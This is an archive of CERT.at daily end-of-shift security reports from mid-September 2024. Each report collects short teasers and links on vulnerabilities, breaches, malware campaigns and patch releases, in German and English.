===================== = End-of-Day report = ===================== Timeframe: Montag 16-09-2024 18:00 − Dienstag 17-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Exploit code released for critical Ivanti RCE flaw, patch now ∗∗∗ --------------------------------------------- A proof-of-concept (PoC) exploit for CVE-2024-29847, a critical remote code execution (RCE) vulnerability in Ivanti Endpoint Manager, is now publicly released, making it crucial to update devices. --------------------------------------------- https://www.bleepingcomputer.com/news/security/exploit-code-released-for-cr… ∗∗∗ Emergency Accounts: Last Call! ∗∗∗ --------------------------------------------- Even if you have been out of office for the last couple of months, you should be aware that starting October 15th you will need to provide Multi Factor Authentication (MFA) to logon to Azure portal, Entra admin center and Intune admin center. This will be enforced to all users accessing these resources regardless of their role or permission level. [..] With Microsoft’s new MFA enforcement, you need a different approach for emergency accounts. --------------------------------------------- https://blog.nviso.eu/2024/09/17/emergency-accounts-last-call/ ∗∗∗ Secure Boot-neutering PKfail debacle is more prevalent than anyone knew ∗∗∗ --------------------------------------------- A supply chain failure that compromises Secure Boot protections on computing devices from across the device-making industry extends to a much larger number of models than previously known, including those used in ATMs, point-of-sale terminals, and voting machines. --------------------------------------------- https://arstechnica.com/?p=2050182 ∗∗∗ Check24 und Verivox: Sensible Daten von Kreditnehmern leicht zugänglich im Netz ∗∗∗ --------------------------------------------- Bei zwei namhaften Vergleichsportalen hat ein Experte Sicherheitslücken entdeckt. Dadurch sollen Kreditangebote mit sensiblen Daten frei abrufbar gewesen sein. [..] Genannt wurden Daten wie Namen und Adressen sowie Angaben zum jeweiligen Arbeitsverhältnis, Einkommen und die Anzahl der Kinder. --------------------------------------------- https://www.golem.de/news/check24-und-verivox-sensible-daten-von-kreditnehm… ∗∗∗ What to Do With Products Without SSO? ∗∗∗ --------------------------------------------- Let’s start with the role that SSO plays in modern defense architecture, and then cover how to implement similar security measures without such a centralized mechanism. --------------------------------------------- https://zeltser.com/products-without-sso/ ∗∗∗ Cyber predators target vulnerable victims: Hackers blackmail hospitals, trade patient data and find partners through darknet ads ∗∗∗ --------------------------------------------- According to data from Check Point Research (CPR), from January – September 2024, the global weekly average number of attacks per organization within the healthcare industry was 2,018, representing a 32% increase, compared to the same period last year. --------------------------------------------- https://blog.checkpoint.com/research/cyber-predators-target-vulnerable-vict… ∗∗∗ ‘Clipper’ malware is being used to steal crypto, Binance warns ∗∗∗ --------------------------------------------- Binance is warning customers that malware is being used to manipulate withdrawal addresses in order to steal cryptocurrency, in a campaign that has led to “significant financial losses for victims.” --------------------------------------------- https://therecord.media/clipper-malware-binance-stealing-crypto ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (php-twig and pymongo), Fedora (linux-firmware, microcode_ctl, and python3.13), Mageia (clamav, microcode, postgresql13 and postgresql15, python3-webob, suricata, tcpreplay, tgt, and wireshark), Oracle (httpd, kernel, and linux-kernel), Red Hat (firefox, kernel, kernel-rt, pcs, and thunderbird), SUSE (389-ds, chromium, golang-github-prometheus-prometheus, htmldoc, kernel, SUSE Manager Client Tools, and wireshark), and Ubuntu (clamav, curl, dcmtk, dovecot, nginx, openssh, and python3.10, python3.12, python3.8). --------------------------------------------- https://lwn.net/Articles/990588/ ∗∗∗ Apple Patches Major Security Flaws With iOS 18 Refresh ∗∗∗ --------------------------------------------- Apple warns that attackers can use Siri to access sensitive user data, control nearby devices, or view recent photos without authentication. According to a bulletin from Cupertino, iOS 18 has been fitted with fixes for vulnerabilities in core components including accessibility features, Bluetooth, Control Center, and Wi-Fi, with several flaws allowing unauthorized access to sensitive data or full device control. --------------------------------------------- https://www.securityweek.com/apple-patches-major-security-flaws-with-ios-18… ∗∗∗ Sicherheitspatch: Hintertür in einigen D-Link-Routern erlaubt unbefugte Zugriffe ∗∗∗ --------------------------------------------- Angreifer können bestimmte Router-Modelle von D-Link attackieren und kompromittieren. Sicherheitsupdates stehen zum Download bereit. --------------------------------------------- https://heise.de/-9870648 ∗∗∗ MISP 2.4.198 released with many bugs fixed, security fixes and improvements. ∗∗∗ --------------------------------------------- https://www.misp-project.org/2024/09/17/MISP.2.4.198.released.html/ ∗∗∗ Yokogawa Dual-redundant Platform for Computer (PC2CKM) ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-261-03 ∗∗∗ Millbeck Communications Proroute H685t-w ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-261-02 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.09.2024
by Daily end-of-shift report 16 Sep '24

16 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 13-09-2024 18:00 − Montag 16-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ 1.3 million Android-based TV boxes backdoored; researchers still don’t know how ∗∗∗ --------------------------------------------- Infection corrals devices running AOSP-based firmware into a botnet. --------------------------------------------- https://arstechnica.com/?p=2049773 ∗∗∗ Malware locks browser in kiosk mode to steal Google credentials ∗∗∗ --------------------------------------------- A malware campaign uses the unusual method of locking users in their browsers kiosk mode to annoy them into entering their Google credentials, which are then stolen by information-stealing malware. --------------------------------------------- https://www.bleepingcomputer.com/news/security/malware-locks-browser-in-kio… ∗∗∗ Nach Cyberangriff: Hacker stellen Daten von Kawasaki ins Darknet ∗∗∗ --------------------------------------------- Kawasaki selbst behauptet, der Cyberangriff sei "nicht erfolgreich" gewesen. Dennoch sind im Darknet fast 500 GBytes an Unternehmensdaten aufgetaucht. --------------------------------------------- https://www.golem.de/news/nach-cyberangriff-hacker-stellen-daten-von-kawasa… ∗∗∗ Australia Threatens to Force Companies to Break Encryption ∗∗∗ --------------------------------------------- In 2018, Australia passed the Assistance and Access Act, which - among other things - gave the government the power to force companies to break their own encryption. The Assistance and Access Act includes key components that outline investigatory powers between government and industry. These components include: Technical Assistance .. --------------------------------------------- https://www.schneier.com/blog/archives/2024/09/australia-threatens-to-force… ∗∗∗ Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks ∗∗∗ --------------------------------------------- Cybersecurity researchers have warned of ongoing phishing campaigns that abuse refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users credentials."Unlike other phishing webpage .. --------------------------------------------- https://thehackernews.com/2024/09/cybercriminals-exploit-http-headers-for.h… ∗∗∗ Prison just got rougher as band of heinously violent cybercrims sentenced to lengthy stints ∗∗∗ --------------------------------------------- Orchestrators of abductions, torture, crypto thefts, and more get their comeuppance One cybercriminal of the most violent kind will spend his best years behind bars, as will 11 of his thug pals for a string of cryptocurrency robberies in the US. --------------------------------------------- https://www.theregister.com/2024/09/16/prison_just_got_rougher_as/ ∗∗∗ Germany’s CDU still struggling to restore data months after June cyberattack ∗∗∗ --------------------------------------------- Putting a spanner in work for plans of opposition party to launch a comeback during next years elections One of Germanys major political parties is still struggling to restore member data more than three months after a June cyberattack targeting its systems. --------------------------------------------- https://www.theregister.com/2024/09/16/nein_luck_for_germanys_cdu/ ∗∗∗ Acquiring Malicious Browser Extension Samples on a Shoestring Budget ∗∗∗ --------------------------------------------- A friend of mine sent me a link to an article on malicious browser extensions that worked around Google Chrome Manifest V3 and asked if I had or could acquire a sample. In the process of getting a sample, I thought, if I was someone who didn’t have the paid resources that an enterprise might have, how would .. --------------------------------------------- https://pberba.github.io/crypto/2024/09/14/malicious-browser-extension-gene… ∗∗∗ Akute Welle an DDoS-Angriffen gegen österreichische Unternehmen und Organisationen ∗∗∗ --------------------------------------------- Seit kurzem sind verschiedene österreichische Unternehmen und Organisationen aus unterschiedlichen Branchen und Sektoren mit DDoS-Angriffen konfrontiert. Die genauen Hintergründe der Attacke sind uns zurzeit nicht bekannt, Hinweise für eine hacktivistische Motivation liegen jedoch vor. In Anbetracht der aktuellen Geschehnisse empfehlen wir .. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/9/ddos-angriffe-september-2024 ∗∗∗ German radio station forced to broadcast emergency tape following cyberattack ∗∗∗ --------------------------------------------- Radio Geretsried, a local station in Germany, has blamed “unknown attackers from Russia” after an apparent ransomware incident left it broadcasting music from emergency backups. --------------------------------------------- https://therecord.media/germany-cyberattack-radio-geretsried ∗∗∗ Small Devices, Big Threats: The Dark Side of Removable Devices ∗∗∗ --------------------------------------------- Our new article highlights the security risks of removable devices like USB drives and SD cards, exploring real-world threats and offering key cybersecurity tips to protect sensitive data. --------------------------------------------- https://www.emsisoft.com/en/blog/45977/small-devices-big-threats-the-dark-s… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (git, nodejs, and ring), Fedora (apr, bubblewrap, chromium, clamav, flatpak, mingw-expat, python3-docs, python3.12, and thunderbird), Mageia (assimp, botan2, python-tqdm, and radare2), Slackware (libarchive), and SUSE (curl). --------------------------------------------- https://lwn.net/Articles/990455/ ∗∗∗ MISP 2.4.198 released with bug and security fixes. ∗∗∗ --------------------------------------------- Based on a set of fixes including a security fix, we are pleased to announce the immediate availability of MISP 2.4.198. You can find a list of the detailed changes along with new features further below. As with any security release, we highly encourage everyone to update their instance as soon as .. --------------------------------------------- https://github.com/MISP/MISP/releases/tag/v2.4.198 ∗∗∗ ZDI-24-1226: mySCADA myPRO Hard-Coded Credentials Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1226/ ∗∗∗ ZDI-24-1225: SolarWinds Access Rights Manager Hard-Coded Credentials Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1225/ ∗∗∗ ZDI-24-1224: SolarWinds Access Rights Manager JsonSerializationBinder Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1224/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 13.09.2024
by Daily end-of-shift report 13 Sep '24

13 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 12-09-2024 18:00 − Freitag 13-09-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Distributed Denial of Truth (DDoT): The Mechanics of Influence Operations and The Weaponization of Social Media ∗∗∗ --------------------------------------------- With the US election on the horizon, it’s a good time to explore the concept of social media weaponization and its use in asymmetrically manipulating public opinion through bots, automation, AI, and shady new tools in what Trustwave SpiderLabs has dubbed the Distributed Denial of Truth (DDoT). --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/distributed… ∗∗∗ Fortinet Confirms Limited Data Breach After Hacker Leaks 440 GB of Data ∗∗∗ --------------------------------------------- A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint vulnerability. The breach, dubbed “Fortileak,” was revealed on a forum with access credentials shared online. [..] Fortinet has now published a blog post addressing the incident, which only affected less than 0.3% of its customers. --------------------------------------------- https://hackread.com/fortinet-confirms-data-breach-hacker-data-leak/ ∗∗∗ Nach CrowdStrike: Microsoft plant Security-Lösungen aus dem Windows-Kernel zu entfernen ∗∗∗ --------------------------------------------- Microsoft hat erste Pläne skizziert, wie sich Windows-Systeme so absichern lassen, dass ein kaputtes Update einer Endpunkt-Sicherheitslösung nicht das ganze Betriebssystem in den Abgrund reißt. --------------------------------------------- https://www.borncity.com/blog/2024/09/13/nach-crowdstrike-microsoft-plant-s… ∗∗∗ I stole 20 GB of data from Capgemini – and now Im leaking it, says cybercrook ∗∗∗ --------------------------------------------- A miscreant claims to have broken into Capgemini and leaked a large amount of sensitive data stolen from the technology services giant – including source code, credentials, and T-Mobile's virtual machine logs. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/09/12/capgemini_br… ∗∗∗ 1.3 Million Android TV Boxes Infected by Vo1d Malware ∗∗∗ --------------------------------------------- Doctor Web warns of the new Vo1d Android malware infecting roughly 1.3 million TV boxes running older OS versions. --------------------------------------------- https://www.securityweek.com/1-3-million-android-tv-boxes-infected-by-vo1d-… ∗∗∗ CVE-2024-29847 Deep Dive: Ivanti Endpoint Manager AgentPortal Deserialization of Untrusted Data Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On September 12th, 2024, ZDI and Ivanti released an advisory describing a deserialization vulnerability resulting in remote code execution with a CVSS score of 9.8. In this post we detail the internal workings of this vulnerability. --------------------------------------------- https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29847-deep-di… ∗∗∗ The Dark Nexus Between Harm Groups and ‘The Com’ ∗∗∗ --------------------------------------------- A cyberattack that shut down two of the top casinos in Las Vegas last year quickly became one of the most riveting security stories of 2023. It was the first known case of native English-speaking hackers in the United States and Britain teaming up with ransomware gangs based in Russia. But that made-for-Hollywood narrative has eclipsed a far more hideous trend: Many of these young, Western cybercriminals are also members of fast-growing online groups that exist solely to bully, stalk, harass and extort vulnerable teens into physically harming themselves and others. --------------------------------------------- https://krebsonsecurity.com/2024/09/the-dark-nexus-between-harm-groups-and-… ∗∗∗ Woo Skimmer Uses Style Tags and Image Extension to Steal Card Details ∗∗∗ --------------------------------------------- This post starts the same way many others do on this blog, and it will be familiar to those who keep up with website security: A client came to us having been notified by their payment processor that credit cards were being stolen from the checkout page of their eCommerce website. The question of course was how? During this investigation we uncovered a very interesting (and in fact, creative) way that threat actors were pilfering credit card details from this compromised website. --------------------------------------------- https://blog.sucuri.net/2024/09/woo-skimmer-uses-style-tags-and-image-exten… ∗∗∗ We can try to bridge the cybersecurity skills gap, but that doesn’t necessarily mean more jobs for defenders ∗∗∗ --------------------------------------------- I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again. --------------------------------------------- https://blog.talosintelligence.com/threat-source-newsletter-sept-12-2024/ ∗∗∗ FBI and CISA Release Joint PSA, Just So You Know: False Claims of Hacked Voter Information Likely Intended to Sow Distrust of U.S. Elections ∗∗∗ --------------------------------------------- As observed through multiple election cycles, foreign actors and cybercriminals continue to spread false information through various platforms to manipulate public opinion, discredit the electoral process, and undermine confidence in U.S. democratic institutions. The FBI and CISA continue to work closely with federal, state, local, and territorial election partners and provide services and information to safeguard U.S. voting processes and maintain the resilience of the U.S. elections. --------------------------------------------- https://www.cisa.gov/news-events/news/fbi-and-cisa-release-joint-psa-just-s… ===================== = Vulnerabilities = ===================== NTR -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 12.09.2024
by Daily end-of-shift report 12 Sep '24

12 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 11-09-2024 18:00 − Donnerstag 12-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ GitLab warns of critical pipeline execution vulnerability ∗∗∗ --------------------------------------------- GitLab has released critical updates to address multiple vulnerabilities, the most severe of them (CVE-2024-6678) allowing an attacker to trigger pipelines as arbitrary users under certain conditions. --------------------------------------------- https://www.bleepingcomputer.com/news/security/gitlab-warns-of-critical-pip… ∗∗∗ Sicherheitspaket: CCC droht mit Anleitungen zur Überwachungssabotage ∗∗∗ --------------------------------------------- Zivilgesellschaftliche Verbände sind empört über das Sicherheitspaket der Bundesregierung. Der "billige Populismus" spiele Rechtsextremen in die Hände. --------------------------------------------- https://www.golem.de/news/sicherheitspaket-ccc-droht-mit-anleitungen-zur-ue… ∗∗∗ SiteCheck Remote Website Scanner — Mid-Year 2024 Report ∗∗∗ --------------------------------------------- Conducting an external website scan for indicators of compromise is one of the easiest ways to identify security issues. While remote website scanners may not provide as comprehensive of a scan as server-side scanners, .. --------------------------------------------- https://blog.sucuri.net/2024/09/sitecheck-remote-website-scanner-mid-year-2… ∗∗∗ DragonRank Black Hat SEO Campaign Targeting IIS Servers Across Asia and Europe ∗∗∗ --------------------------------------------- A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation.The black hat SEO .. --------------------------------------------- https://thehackernews.com/2024/09/dragonrank-black-hat-seo-campaign.html ∗∗∗ Exposed Selenium Grid Servers Targeted for Crypto Mining and Proxyjacking ∗∗∗ --------------------------------------------- Internet-exposed Selenium Grid instances are being targeted by bad actors for illicit cryptocurrency mining and proxyjacking campaigns."Selenium Grid is a server that facilitates running test cases in parallel .. --------------------------------------------- https://thehackernews.com/2024/09/exposed-selenium-grid-servers-targeted.ht… ∗∗∗ Transport for London confirms 5,000 user bank data exposed, pulls large chunks of IT infra offline ∗∗∗ --------------------------------------------- Hauling in 30,000 staff IN PERSON to do password resets Breaking Transport for Londons ongoing cyber incident has taken a dark turn as the organization confirmed that some data, including bank details, might have been accessed, and 30,000 employees passwords will need to be reset via in-person appointments. --------------------------------------------- https://www.theregister.com/2024/09/12/transport_for_londons_cyber_attack/ ∗∗∗ Microsoft Windows MSI Installer - Repair to SYSTEM - A detailed journey ∗∗∗ --------------------------------------------- Repair functions of Microsoft Windows MSI installers can be vulnerable in several ways, for instance allowing local attackers to .. --------------------------------------------- https://sec-consult.com/blog/detail/msi-installer-repair-to-system-a-detail… ∗∗∗ Living off the land, GPO style ∗∗∗ --------------------------------------------- TL;DR The ability to edit Group Policy Object (GPOs) from non-domain joined computers using the native Group Policy editor has been on my list for a long time. This blog .. --------------------------------------------- https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/ ∗∗∗ Ransomware: Attacks Once More Nearing Peak Levels ∗∗∗ --------------------------------------------- Attacks surge again in second quarter of 2024 as attackers bounce back from disruption. --------------------------------------------- https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomwa… ∗∗∗ Introduction to Third-Party Risk Management ∗∗∗ --------------------------------------------- In today’s world, organizations are increasingly depending on their third-party vendors, suppliers, and partners to support their operations. This way of working, in addition to the digitalization era we’re in, can have great advantages such as being able to offer new services quickly while relying on other’s expertise or cutting costs on already existing processes. --------------------------------------------- https://blog.nviso.eu/2024/09/12/introduction-to-third-party-risk-managemen… ∗∗∗ Vulnerability in Acrobat Reader could lead to remote code execution; Microsoft patches information disclosure issue in Windows API ∗∗∗ --------------------------------------------- CVE-2024-38257 is considered “less likely” to be exploited, though it does not require any user interaction or user privileges. --------------------------------------------- https://blog.talosintelligence.com/vulnerability-roundup-sept-11-2024/ ∗∗∗ Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities ∗∗∗ --------------------------------------------- In this blog entry, we provide an analysis of the recent remote code execution attacks related to Progress Software’s WhatsUp Gold that possibly abused the vulnerabilities CVE-2024-6670 and CVE-2024-6671. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html ∗∗∗ Hadooken Malware Targets Weblogic Applications ∗∗∗ --------------------------------------------- Aqua Nautilus researchers identified a new Linux malware targeting Weblogic servers. The main payload calls itself Hadooken which we think is referring to the attack “surge fist” in the Street Fighter series. When Hadooken is executed, .. --------------------------------------------- https://blog.aquasec.com/hadooken-malware-targets-weblogic-applications-1 ∗∗∗ Microsoft Office: ActiveX wird abgedreht ∗∗∗ --------------------------------------------- Länger war es still darum, aber ActiveX gibt es noch. Kommende Microsoft Office-Versionen schalten die Unterstützung endlich ab. Zumindest fast. --------------------------------------------- https://heise.de/-9865690 ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Routed Passive Optical Network Controller Vulnerabilities ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XR Software UDP Packet Memory Exhaustion Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Multiple Cisco Products Web-Based Management Interface Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XR Software Network Convergence System Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XR Software Segment Routing for Intermediate System-to-Intermediate System Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XR Software Dedicated XML Agent TCP Denial of Service Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XR Software CLI Arbitrary File Read Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Cisco IOS XR Software CLI Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 11.09.2024
by Daily end-of-shift report 11 Sep '24

11 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 10-09-2024 18:00 − Mittwoch 11-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ New PIXHELL acoustic attack leaks secrets from LCD screen noise ∗∗∗ --------------------------------------------- A novel acoustic attack named PIXHELL can leak secrets from air-gapped and audio-gapped systems, and without requiring speakers, through the LCD monitors they connect to. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-pixhell-acoustic-attack-… ∗∗∗ Air-Gapped-Systeme: Malware nutzt LCD-Pixelmuster für Datenausleitung per Schall ∗∗∗ --------------------------------------------- Der Empfang erfolgt zum Beispiel über ein in der Nähe befindliches Smartphone. Die Datenrate ist gering, reicht aber für Keylogging und Passwörter. --------------------------------------------- https://www.golem.de/news/air-gapped-systeme-malware-nutzt-lcd-pixelmuster-… ∗∗∗ Python Libraries Used for Malicious Purposes ∗∗∗ --------------------------------------------- Since I'm interested in malicious Python scripts, I found multiple samples that rely on existing libraries. The most-known repository is probably pypi.org[1] that reports, as of today, 567,478 projects! Malware developers are like regular developers: They don't want to reinvent the wheel and make their shopping across existing libraries to expand their scripts capabilities. --------------------------------------------- https://isc.sans.edu/forums/diary/Python+Libraries+Used+for+Malicious+Purpo… ∗∗∗ Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware ∗∗∗ --------------------------------------------- Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments."The new samples were tracked to GitHub projects that .. --------------------------------------------- https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html ∗∗∗ Microsoft says it broke some Windows 10 patching – as it fixes flaws under attack ∗∗∗ --------------------------------------------- CISA wants you to leap on Citrix and Ivanti issues. Adobe, Intel, SAP also bid for patching priorities Patch Tuesday Another Patch Tuesday has dawned, as usual with the unpleasant news that there are pressing security weaknesses and blunders to address. --------------------------------------------- https://www.theregister.com/2024/09/11/patch_tuesday_september_2024/ ∗∗∗ So you paid a ransom demand … and now the decryptor doesnt work ∗∗∗ --------------------------------------------- A really big oh sh*t moment, for sure For C-suite execs and security leaders, discovering your organization has been breached, your critical systems locked up and your data stolen, then receiving a ransom demand, is probably the worst day of your professional life. --------------------------------------------- https://www.theregister.com/2024/09/11/ransomware_decryptor_not_working/ ∗∗∗ Over 40,000 WordPress Sites Affected by Privilege Escalation Vulnerability Patched in Post Grid and Gutenberg Blocks Plugin ∗∗∗ --------------------------------------------- On August 14th, 2024, we received a submission for a Privilege Escalation vulnerability in Post Grid and Gutenberg Blocks, a WordPress plugin with over 40,000 active installations. This vulnerability can be leveraged by attackers with minimal authenticated access to set their role to administrator utilizing the form submission functionality. --------------------------------------------- https://www.wordfence.com/blog/2024/09/over-40000-wordpress-sites-affected-… ∗∗∗ ADCS Attack Paths in BloodHound — Part 3 ∗∗∗ --------------------------------------------- In Part 1 of this series, we explained how we incorporated Active Directory Certificate Services (ADCS) objects into BloodHound and demonstrated how to effectively use BloodHound to identify attack paths, including the ESC1 domain escalation technique. Part 2 covered the Golden Certificates .. --------------------------------------------- https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb008… ∗∗∗ Phishing Pages Delivered Through Refresh HTTP Response Header ∗∗∗ --------------------------------------------- We detail a rare phishing mechanism using a refresh entry in the HTTP response header for stealth redirects to malicious pages, affecting finance and government sectors. --------------------------------------------- https://unit42.paloaltonetworks.com/rare-phishing-page-delivery-header-refr… ∗∗∗ The September 2024 Security Update Review ∗∗∗ --------------------------------------------- We’ve reached September and the pumpkin spice floats in the air. While they aren’t pumpkin-spiced, Microsoft and Adobe have released their latest spicy security patches – including some zesty 0-days. Take a break from .. --------------------------------------------- https://www.thezdi.com/blog/2024/9/10/the-september-2024-security-update-re… ∗∗∗ SBOMs and the importance of inventory ∗∗∗ --------------------------------------------- Can a Software Bill of Materials (SBOM) provide organisations with better insight into their supply chains? --------------------------------------------- https://www.ncsc.gov.uk/blog-post/sboms-and-the-importance-of-inventory ∗∗∗ We Spent $20 To Achieve RCE And Accidentally Became The Admins Of .MOBI ∗∗∗ --------------------------------------------- Welcome back to another watchTowr Labs blog. Brace yourselves, this is one of our most astounding discoveries.SummaryWhat started out as a bit of fun between colleagues while avoiding the Vegas heat and $20 bottles of water in our Black Hat hotel .. --------------------------------------------- https://labs.watchtowr.com/we-spent-20-to-achieve-rce-and-accidentally-beca… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (389-ds:1.4, dovecot, emacs, and glib2), Fedora (bluez, iwd, libell, linux-firmware, seamonkey, vim, and wireshark), Mageia (apr, libtiff, Nginx, openssl, orc, unbound, webmin, and zziplib), Red Hat (389-ds:1.4), and SUSE (containerd, curl, go1.22, go1.23, gstreamer-plugins-bad, kernel, ntpd-rs, python-Django, and python311). --------------------------------------------- https://lwn.net/Articles/989772/ ∗∗∗ Cisco Releases Security Updates for Cisco Smart Licensing Utility ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2024/09/10/cisco-releases-security-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.09.2024
by Daily end-of-shift report 10 Sep '24

10 Sep '24

===================== = End-of-Day report = ===================== Timeframe: Montag 09-09-2024 18:00 − Dienstag 10-09-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Quad7 botnet targets more SOHO and VPN routers, media servers ∗∗∗ --------------------------------------------- The Quad7 botnet is expanding its targeting scope with the addition of new clusters and custom implants that now also target Zyxel VPN appliances and Ruckus wireless routers. --------------------------------------------- https://www.bleepingcomputer.com/news/security/quad7-botnet-targets-more-so… ∗∗∗ NoName ransomware gang deploying RansomHub malware in recent attacks ∗∗∗ --------------------------------------------- The NoName ransomware gang has been trying to build a reputation for more than three years targeting small and medium-sized businesses worldwide with its encryptors and may now be working as a RansomHub affiliate. --------------------------------------------- https://www.bleepingcomputer.com/news/security/noname-ransomware-gang-deplo… ∗∗∗ Trustwave SpiderLabs Research: 20% of Ransomware Attacks in Financial Services Target Banking Institutions ∗∗∗ --------------------------------------------- The 2024 Trustwave Risk Radar Report: Financial Services Sector underscores the escalating threat landscape facing the industry. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trustwave-s… ∗∗∗ Russias top-secret military unit reportedly plots undersea cable sabotage ∗∗∗ --------------------------------------------- US alarmed by heightened Kremlin naval activity worldwide Russias naval activity near undersea cables is reportedly drawing the scrutiny of US officials, further sparking concerns that the Kremlin may be plotting to "sabotage" underwater infrastructure via a secretive, dedicated military unit called the General Staff Main Directorate for Deep Sea Research (GUGI). --------------------------------------------- https://www.theregister.com/2024/09/09/russia_readies_submarine_cable_sabot… ∗∗∗ Phishing Via Typosquatting and Brand Impersonation: Trends and Tactics ∗∗∗ --------------------------------------------- Introduction Following the 2024 ThreatLabz Phishing Report, Zscaler ThreatLabz has been closely tracking domains associated with typosquatting and brand impersonation - common techniques used by threat actors to proliferate phishing campaigns. Typosquatting involves registering domains with misspelled versions of popular websites or .. --------------------------------------------- https://www.zscaler.com/blogs/security-research/phishing-typosquatting-and-… ∗∗∗ Slim CD Data Breach Impacts 1.7 Million Individuals ∗∗∗ --------------------------------------------- Slim CD says the personal and credit card information of 1.7 million was compromised in a ten-month-long data breach. --------------------------------------------- https://www.securityweek.com/slim-cd-data-breach-impacts-1-7-million-indivi… ∗∗∗ Study Finds Excessive Use of Remote Access Tools in OT Environments ∗∗∗ --------------------------------------------- The excessive use of remote access tools in OT environments can increase the attack surface, complicate identity management, and hinder visibility. --------------------------------------------- https://www.securityweek.com/study-finds-excessive-use-of-remote-access-too… ∗∗∗ Smart home security advice. Ring, SimpliSafe, Swann, and Yale ∗∗∗ --------------------------------------------- Introduction This guide covers the security of smart home security products from Ring, Yale, Swann, and SimpliSafe. Whether you’re looking to monitor your property remotely, enhance your home’s security, or .. --------------------------------------------- https://www.pentestpartners.com/security-blog/smart-home-security-advice-ri… ∗∗∗ Firmen überschätzen eigene Abwehrbereitschaft gegen Hacker ∗∗∗ --------------------------------------------- Laut einer aktuellen Studie zahlten 86 Prozent der befragten Firmen im vergangenen Jahr "Lösegeld", nachdem ihre Systeme infiziert wurden --------------------------------------------- https://www.derstandard.at/story/3000000235958/firmen-ueberschaetzen-eigene… 